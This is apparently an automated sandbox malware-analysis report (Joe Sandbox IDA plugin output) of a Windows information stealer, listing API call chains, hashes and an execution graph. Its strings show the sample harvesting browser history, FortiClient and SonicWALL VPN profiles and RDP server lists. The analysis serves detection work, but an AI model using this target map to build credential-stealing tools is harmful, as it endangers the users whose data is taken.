                                                                        Similarity
                                                                        • API ID: File$lstrcatlstrlen$CloseHandleHeapView__memcpy$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWide
                                                                        • String ID: Default$LOCALAPPDATA$\History
                                                                        • API String ID: 3980575106-3555721359
                                                                        • Opcode ID: e458c9bbc1e433a6070e94e619f8eddafc94a087af4b5de136e6cc17d609cf52
                                                                        • Instruction ID: 39de7f69e226e41b7121943806c817543c4706f2075b2b4e1b589212eeb94b66
                                                                        • Opcode Fuzzy Hash: e458c9bbc1e433a6070e94e619f8eddafc94a087af4b5de136e6cc17d609cf52
                                                                        • Instruction Fuzzy Hash: 40515322D19F86C3E750DF24E9412A87370FB99B84F45A262DB8D53666EF34E6C9C300
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: CreateInitializeInstanceUninitialize
                                                                        • String ID: http
                                                                        • API String ID: 948891078-2541227442
                                                                        • Opcode ID: 61d6fafc4f2f16fc748729536d6a842c444dad62491da6ffe95140971a1bef2d
                                                                        • Instruction ID: 0a9483150e1cfd09b56b4e06670531b8f7d020af45f16ad38de8067e06accfc8
                                                                        • Opcode Fuzzy Hash: 61d6fafc4f2f16fc748729536d6a842c444dad62491da6ffe95140971a1bef2d
                                                                        • Instruction Fuzzy Hash: 2E414C3260AB46D6E7109F75E4903ED23A1FB85B88F044176EA4E8BAA8DF3CD556C700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: Time$FileProcessSystem$CloseCodeExitHandleNamedObjectPeekPipeSingleTerminateWait
                                                                        • String ID: exit
                                                                        • API String ID: 1626563136-1626635026
                                                                        • Opcode ID: e8db0668784a4e42b00b615d6c0ccb33bfa89d96bba3dbda8ec61e812724d3ba
                                                                        • Instruction ID: 09da72074ea2520e3cfbd083344e6fa64c69f324926d41e447d52816eae28b69
                                                                        • Opcode Fuzzy Hash: e8db0668784a4e42b00b615d6c0ccb33bfa89d96bba3dbda8ec61e812724d3ba
                                                                        • Instruction Fuzzy Hash: 5F310E31A0A643CAEF50DF25E4512792761EF86B84F5490B3EA0EC65A9DF2DD847C740
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: Create$ArrayFileSafe$DataStringTime$AccessAllocCloseExecuteFreeHandleInitInitializeInstancePathShellSystemTempUnaccessVariantVectorWritewsprintf
                                                                        • String ID:
                                                                        • API String ID: 1750269033-0
                                                                        • Opcode ID: 1c5d2654c08cc8127abb35339070594f2d16baf8560606254011173d46aa1ed8
                                                                        • Instruction ID: 775260ead6950d42403ff7f64dfbf025543f909085f7cca923e6c50dd65aa03f
                                                                        • Opcode Fuzzy Hash: 1c5d2654c08cc8127abb35339070594f2d16baf8560606254011173d46aa1ed8
                                                                        • Instruction Fuzzy Hash: 73614B36B09A06D6EB04DF66D4543AD23B0FB89B88F448172DE0E97B69DF39D50AC340
                                                                        APIs
                                                                          • Part of subcall function 00007FF6AAB425DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6AAB41985,?,?,?,00007FF6AAB4155F), ref: 00007FF6AAB425E5
                                                                        • __memcpy.DELAYIMP ref: 00007FF6AAB4F1A3
                                                                          • Part of subcall function 00007FF6AAB50128: __memcpy.DELAYIMP ref: 00007FF6AAB50159
                                                                          • Part of subcall function 00007FF6AAB50128: __memcpy.DELAYIMP ref: 00007FF6AAB50167
                                                                          • Part of subcall function 00007FF6AAB4EBA8: lstrlenA.KERNEL32 ref: 00007FF6AAB4EBC5
                                                                          • Part of subcall function 00007FF6AAB425B4: GetProcessHeap.KERNEL32 ref: 00007FF6AAB425C1
                                                                          • Part of subcall function 00007FF6AAB425B4: RtlFreeHeap.NTDLL ref: 00007FF6AAB425CF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: Heap__memcpy$Process$Freelstrlen
                                                                        • String ID: last_visit_time$table$url$urls
                                                                        • API String ID: 2336645791-3896411411
                                                                        • Opcode ID: 4e01d393290f7b606867a0265dcb02fe101fb4defd41225e9d4834dacb7dced9
                                                                        • Instruction ID: 9a232f3c60e6955ca2f17c452f3a42bcc0d535b8e72200d77adf818f61c4392a
                                                                        • Opcode Fuzzy Hash: 4e01d393290f7b606867a0265dcb02fe101fb4defd41225e9d4834dacb7dced9
                                                                        • Instruction Fuzzy Hash: F731746660A743C2EE60DB26E4405FA6790BB86BC0F444173EE8E97795EE3CD447D700
                                                                        APIs
                                                                          • Part of subcall function 00007FF6AAB425DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6AAB41985,?,?,?,00007FF6AAB4155F), ref: 00007FF6AAB425E5
                                                                        • __memcpy.DELAYIMP ref: 00007FF6AAB4ED57
                                                                          • Part of subcall function 00007FF6AAB50128: __memcpy.DELAYIMP ref: 00007FF6AAB50159
                                                                          • Part of subcall function 00007FF6AAB50128: __memcpy.DELAYIMP ref: 00007FF6AAB50167
                                                                          • Part of subcall function 00007FF6AAB4EBA8: lstrlenA.KERNEL32 ref: 00007FF6AAB4EBC5
                                                                          • Part of subcall function 00007FF6AAB425B4: GetProcessHeap.KERNEL32 ref: 00007FF6AAB425C1
                                                                          • Part of subcall function 00007FF6AAB425B4: RtlFreeHeap.NTDLL ref: 00007FF6AAB425CF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: Heap__memcpy$Process$Freelstrlen
                                                                        • String ID: last_visit_time$table$url$urls
                                                                        • API String ID: 2336645791-3896411411
                                                                        • Opcode ID: 293500e957469f0c4013cfb38b400ff077528cbd213c6b76c435456541af9200
                                                                        • Instruction ID: 2173967cddf931a10ef875487a25650b3256bdd195a78922d175093208a1694e
                                                                        • Opcode Fuzzy Hash: 293500e957469f0c4013cfb38b400ff077528cbd213c6b76c435456541af9200
                                                                        • Instruction Fuzzy Hash: A8315166A0A683C6EA60DB26E8405EA6360BB86BC4F444073DE4E87795EF3CE547D704
                                                                        APIs
                                                                          • Part of subcall function 00007FF6AAB425DC: GetProcessHeap.KERNEL32(?,?,?,00007FF6AAB41985,?,?,?,00007FF6AAB4155F), ref: 00007FF6AAB425E5
                                                                        • __memcpy.DELAYIMP ref: 00007FF6AAB4EF77
                                                                          • Part of subcall function 00007FF6AAB50128: __memcpy.DELAYIMP ref: 00007FF6AAB50159
                                                                          • Part of subcall function 00007FF6AAB50128: __memcpy.DELAYIMP ref: 00007FF6AAB50167
                                                                          • Part of subcall function 00007FF6AAB4EBA8: lstrlenA.KERNEL32 ref: 00007FF6AAB4EBC5
                                                                          • Part of subcall function 00007FF6AAB425B4: GetProcessHeap.KERNEL32 ref: 00007FF6AAB425C1
                                                                          • Part of subcall function 00007FF6AAB425B4: RtlFreeHeap.NTDLL ref: 00007FF6AAB425CF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: Heap__memcpy$Process$Freelstrlen
                                                                        • String ID: last_visit_date$moz_places$table$url
                                                                        • API String ID: 2336645791-66087218
                                                                        • Opcode ID: 53100e1e7fade05cffaf64fca1c5be8d3b62604d3c00a5c6fca6984d0be0bcad
                                                                        • Instruction ID: 768d66664c9a7d4e8367d6a53ef98378d6c17fa4fd17cbba7571224e0753f283
                                                                        • Opcode Fuzzy Hash: 53100e1e7fade05cffaf64fca1c5be8d3b62604d3c00a5c6fca6984d0be0bcad
                                                                        • Instruction Fuzzy Hash: 68316222A0A743C6EA60DF26E8401BA6750BB86BC4F448173DE4EC7795EE7DE947D700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: AppendPathlstrcpy
                                                                        • String ID: ":"$"},$Software\Fortinet\FortiClient\Sslvpn\Tunnels
                                                                        • API String ID: 3043196718-4231764533
                                                                        • Opcode ID: 5a0e9e39c7ed851297b8f33945213af4e2244548cb2022a3a818ec5182f3b1dd
                                                                        • Instruction ID: dd8e4f1e5501136bb2d0e58930fa09490476dc538e8c957a60ba0cfa59369e99
                                                                        • Opcode Fuzzy Hash: 5a0e9e39c7ed851297b8f33945213af4e2244548cb2022a3a818ec5182f3b1dd
                                                                        • Instruction Fuzzy Hash: 9F31B471A19B82D2EA20EF62E8041E96361FB89BC0F544173EA5E87799DF3CD546C700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateValue
                                                                        • String ID: ?
                                                                        • API String ID: 1818849710-1684325040
                                                                        • Opcode ID: 3f4fa53e5a041a1e0e060734a6e5b713b9a361546c9d3b1e30c4574215ea1982
                                                                        • Instruction ID: def37a3bb2af3a1587345149a9e272de0f96a172ed83583931422c93902b811c
                                                                        • Opcode Fuzzy Hash: 3f4fa53e5a041a1e0e060734a6e5b713b9a361546c9d3b1e30c4574215ea1982
                                                                        • Instruction Fuzzy Hash: E921B172A14790CAE7208F71E8402ED7BA4FB89798F544266EA8D43B99DF3CC145CB10
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: HeapValue$AppendFreePathProcesslstrcpy
                                                                        • String ID: "},$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles
                                                                        • API String ID: 784796242-1893226844
                                                                        • Opcode ID: 6de241257080d24fefd68c1b8e26bb5bf50d8cf1b3b9d4444734eb6179e3eb24
                                                                        • Instruction ID: 0ea0ed94844420ab701b18dc9f12532d0d836425a20e8ac93eb7127d7a3559cd
                                                                        • Opcode Fuzzy Hash: 6de241257080d24fefd68c1b8e26bb5bf50d8cf1b3b9d4444734eb6179e3eb24
                                                                        • Instruction Fuzzy Hash: D6114211A09683D2ED20EB12F8553FA5361EF86BC0F445173EA5E877AADE2CD106C700
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: Enum$CloseOpen
                                                                        • String ID:
                                                                        • API String ID: 1701607978-0
                                                                        • Opcode ID: fcc6f3c639ec119cf7856154b92cbb5a973dd3f81707c5291cfa5e09fa2fda6b
                                                                        • Instruction ID: 80139d5a095dcbe8da99344188368dd28192d7659ef9f5ecf43335eb1c5ccf30
                                                                        • Opcode Fuzzy Hash: fcc6f3c639ec119cf7856154b92cbb5a973dd3f81707c5291cfa5e09fa2fda6b
                                                                        • Instruction Fuzzy Hash: 7F215832618B8582D3108F11E48076AB7B8F789B84F190226EA8D83B28CF3DD55ACB40
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: Process$AddressCurrentLibraryLoadProcWow64
                                                                        • String ID:
                                                                        • API String ID: 4035193891-0
                                                                        • Opcode ID: cdaa70f4b17d9021ac9a311444477d27912caa0ffaeae6d3bd1739126b036b9d
                                                                        • Instruction ID: 3dfe935276b82b8027dcd6f1956aa974149b74550ffe3228e8fc78ff57f606ff
                                                                        • Opcode Fuzzy Hash: cdaa70f4b17d9021ac9a311444477d27912caa0ffaeae6d3bd1739126b036b9d
                                                                        • Instruction Fuzzy Hash: EB21A562E1E7C2C7EF519F61A4052BAA790FB5A7C0F045276DACE82B56DF6CC145CB00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: Value$AppendPathlstrcpy
                                                                        • String ID: Software\Microsoft\Terminal Server Client\Servers
                                                                        • API String ID: 19203174-1233151749
                                                                        • Opcode ID: dc912856a7e27050b6cdfcd3a7191b37f348cc033d8102c7e34ab7055c14a043
                                                                        • Instruction ID: 6a81a0cd67743ee12eee0161fd959a6bc7a1aed578c83aeacc7ad1980e7e1a30
                                                                        • Opcode Fuzzy Hash: dc912856a7e27050b6cdfcd3a7191b37f348cc033d8102c7e34ab7055c14a043
                                                                        • Instruction Fuzzy Hash: C821C371615A82D6DB20EF62E8142FD6361FB85BC4F444173EA5E8B79ADE3CD206C700
                                                                        APIs
                                                                        • GetEnvironmentVariableW.KERNEL32 ref: 00007FF6AAB4FE25
                                                                        • lstrcatW.KERNEL32 ref: 00007FF6AAB4FE32
                                                                          • Part of subcall function 00007FF6AAB4FF50: lstrlenW.KERNEL32 ref: 00007FF6AAB4FF76
                                                                          • Part of subcall function 00007FF6AAB4FF50: lstrlenW.KERNEL32 ref: 00007FF6AAB4FF92
                                                                          • Part of subcall function 00007FF6AAB4FF50: WideCharToMultiByte.KERNEL32 ref: 00007FF6AAB4FFBB
                                                                          • Part of subcall function 00007FF6AAB4FF50: PathFileExistsA.SHLWAPI ref: 00007FF6AAB4FFC4
                                                                          • Part of subcall function 00007FF6AAB4FF50: OpenFile.KERNEL32 ref: 00007FF6AAB4FFDD
                                                                          • Part of subcall function 00007FF6AAB4FF50: GetFileSize.KERNEL32 ref: 00007FF6AAB4FFFD
                                                                          • Part of subcall function 00007FF6AAB4FF50: CreateFileMappingA.KERNEL32 ref: 00007FF6AAB50034
                                                                          • Part of subcall function 00007FF6AAB4FF50: MapViewOfFile.KERNEL32 ref: 00007FF6AAB50055
                                                                          • Part of subcall function 00007FF6AAB4FF50: __memcpy.DELAYIMP ref: 00007FF6AAB50067
                                                                          • Part of subcall function 00007FF6AAB4FF50: UnmapViewOfFile.KERNEL32 ref: 00007FF6AAB50072
                                                                          • Part of subcall function 00007FF6AAB4FF50: CloseHandle.KERNEL32 ref: 00007FF6AAB5007B
                                                                          • Part of subcall function 00007FF6AAB4FF50: CloseHandle.KERNEL32 ref: 00007FF6AAB50084
                                                                          • Part of subcall function 00007FF6AAB4F294: __memcpy.DELAYIMP ref: 00007FF6AAB4F2B2
                                                                          • Part of subcall function 00007FF6AAB425B4: GetProcessHeap.KERNEL32 ref: 00007FF6AAB425C1
                                                                          • Part of subcall function 00007FF6AAB425B4: RtlFreeHeap.NTDLL ref: 00007FF6AAB425CF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.4143532711.00007FF6AAB41000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAB40000, based on PE: true
                                                                        • Associated: 0000000A.00000002.4143377216.00007FF6AAB40000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143798817.00007FF6AAB51000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143930992.00007FF6AAB54000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.4143979551.00007FF6AAB55000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_7ff6aab40000_BC8F.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcat
                                                                        • String ID: APPDATA
                                                                        • API String ID: 2395011915-4054820676
                                                                        • Opcode ID: 87c3b692c552a36e5dcac7bbf7354c32fc86ccac0c10c444158e78578eef65e3
                                                                        • Instruction ID: fc10c5e0a0b71242c603ffed331b6a4cf3b5e327f0953da9bd2798463fff3e26
                                                                        • Opcode Fuzzy Hash: 87c3b692c552a36e5dcac7bbf7354c32fc86ccac0c10c444158e78578eef65e3
                                                                        • Instruction Fuzzy Hash: 46112132729A82D2EB10DB25E4545EE7371FB85B84F845073EA4E87A59EF3CD50AC740

                                                                        Execution Graph

                                                                        Execution Coverage:4%
                                                                        Dynamic/Decrypted Code Coverage:50.2%
                                                                        Signature Coverage:3.1%
                                                                        Total number of Nodes:802
                                                                        Total number of Limit Nodes:77
                                                                        execution_graph 27239 e09ee8 27240 e09ef1 RtlFreeHeap 27239->27240 27241 e09f1a 27239->27241 27240->27241 27242 e09f02 27240->27242 27244 e07f70 17 API calls 27242->27244 27244->27241 27915 e0f4ec 20 API calls 27916 e04cf5 memset 28018 e39ef6 112 API calls 27356 e028f8 27357 e02900 27356->27357 27358 e02ac8 27356->27358 27391 e01000 GetProcessHeap RtlAllocateHeap 27357->27391 27388 e53848 27358->27388 27361 e0290e 27392 e202ec 27361->27392 27364 e01011 3 API calls 27365 e02adf 27364->27365 27366 e02a8b 27410 e1fb92 91 API calls 27366->27410 27368 e02a98 lstrlen 27369 e02ac1 27368->27369 27370 e02aa4 27368->27370 27372 e01011 3 API calls 27369->27372 27411 e01798 lstrlen 27370->27411 27372->27358 27373 e02ab1 27412 e01798 lstrlen 27373->27412 27375 e02ab9 27413 e01798 lstrlen 27375->27413 27377 e01fa7 19 API calls 27382 e02919 27377->27382 27378 e029da lstrlen 27379 e029eb lstrlen 27378->27379 27378->27382 27379->27382 27380 e202ec 92 API calls 27380->27382 27382->27366 27382->27377 27382->27378 27382->27380 27406 e01000 GetProcessHeap RtlAllocateHeap 27382->27406 27407 e02112 27382->27407 27384 e02a25 wsprintfA lstrlen 27385 e02a58 27384->27385 27386 e02a6a lstrcat 27384->27386 27385->27386 27387 e01011 3 API calls 27386->27387 27387->27382 27414 e537cb 27388->27414 27391->27361 27430 e1faee 27392->27430 27394 e20304 27395 e20308 27394->27395 27400 e20317 27394->27400 27437 e54da0 17 API calls 27395->27437 27398 e20312 27398->27382 27400->27398 27401 e20362 27400->27401 27438 e3ee2b 90 API calls 27400->27438 27439 e1fbf2 91 API calls 27400->27439 27440 e20199 92 API calls 27400->27440 27441 e1fd7b 19 API calls 27401->27441 27404 e2036d 27404->27398 27442 e06c62 memcpy 27404->27442 27406->27382 27445 e01000 GetProcessHeap RtlAllocateHeap 27407->27445 27409 e02121 GetSystemTimeAsFileTime _alldiv wsprintfA 27409->27384 27410->27368 27411->27373 27412->27375 27413->27369 27415 e537d6 27414->27415 27425 e02ad1 DeleteFileW 27414->27425 27426 e095b5 17 API calls 27415->27426 27417 e537db 27418 e537df 27417->27418 27421 e537eb 27417->27421 27427 e54da0 17 API calls 27418->27427 27420 e53834 27429 e53865 69 API calls 27420->27429 27421->27420 27423 e5381f 27421->27423 27428 e08795 22 API calls 27423->27428 27425->27364 27426->27417 27427->27425 27428->27425 27429->27425 27431 e1faf3 27430->27431 27432 e1fb06 27430->27432 27443 e07f70 17 API calls 27431->27443 27444 e1fad1 17 API calls 27432->27444 27435 e1faff 27435->27394 27436 e1fb0b 27436->27394 27437->27398 27438->27400 27439->27400 27440->27400 27441->27404 27442->27398 27443->27435 27444->27436 27445->27409 27918 e05cc5 22 API calls 28023 e2faca _allmul strcspn 27919 e06eb7 22 API calls 27920 e15cca 31 API calls 27922 e534ca 55 API calls 28027 e2c6da 23 API calls 27926 e370de 24 API calls 28029 e056a2 _allrem 27035 e024a4 27038 e02198 RtlZeroMemory GetVersionExW 27035->27038 27039 e021cb LoadLibraryW 27038->27039 27041 e0249b 27039->27041 27042 e021fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27039->27042 27043 e02492 FreeLibrary 27042->27043 27051 e02244 27042->27051 27043->27041 27044 e0247b 27044->27043 27045 e022e1 RtlCompareMemory 27045->27051 27046 e02365 RtlCompareMemory 27046->27051 27047 e01953 6 API calls 27047->27051 27048 e023f8 StrStrIW 27048->27051 27049 e01011 GetProcessHeap RtlFreeHeap VirtualQuery 27049->27051 27050 e017c0 9 API calls 27050->27051 27051->27043 27051->27044 27051->27045 27051->27046 27051->27047 27051->27048 27051->27049 27051->27050 27928 e27ca6 19 API calls 27233 e02ea5 25 API calls 27234 e09ea7 RtlAllocateHeap 27235 e09ec1 27234->27235 27237 e09ed9 27234->27237 27238 e07f70 17 API calls 27235->27238 27238->27237 27929 e1b8a6 88 API calls 27930 e1b0aa 82 API calls 27931 e06eb7 24 API calls 27932 e048b1 22 API calls 27289 e02cb5 27290 e02cbe 27289->27290 27291 e01953 6 API calls 27290->27291 27292 e02cc3 27291->27292 27293 e02e17 27292->27293 27294 e01953 6 API calls 27292->27294 27295 e02cd9 27294->27295 27318 e01000 GetProcessHeap RtlAllocateHeap 27295->27318 27297 e02ce9 27319 e01000 GetProcessHeap RtlAllocateHeap 27297->27319 27299 e02cf9 27300 e01b6a 2 API calls 27299->27300 27301 e02d04 27300->27301 27302 e02ded 27301->27302 27303 e02d0c GetPrivateProfileSectionNamesW 27301->27303 27305 e01011 3 API calls 27302->27305 27303->27302 27304 e02d22 27303->27304 27304->27302 27308 e02d3f StrStrIW 27304->27308 27312 e02dd7 lstrlenW 27304->27312 27316 e01953 6 API calls 27304->27316 27317 e01011 3 API calls 27304->27317 27306 e02e02 27305->27306 27307 e01011 3 API calls 27306->27307 27309 e02e09 27307->27309 27311 e02d53 GetPrivateProfileStringW 27308->27311 27308->27312 27310 e01011 3 API calls 27309->27310 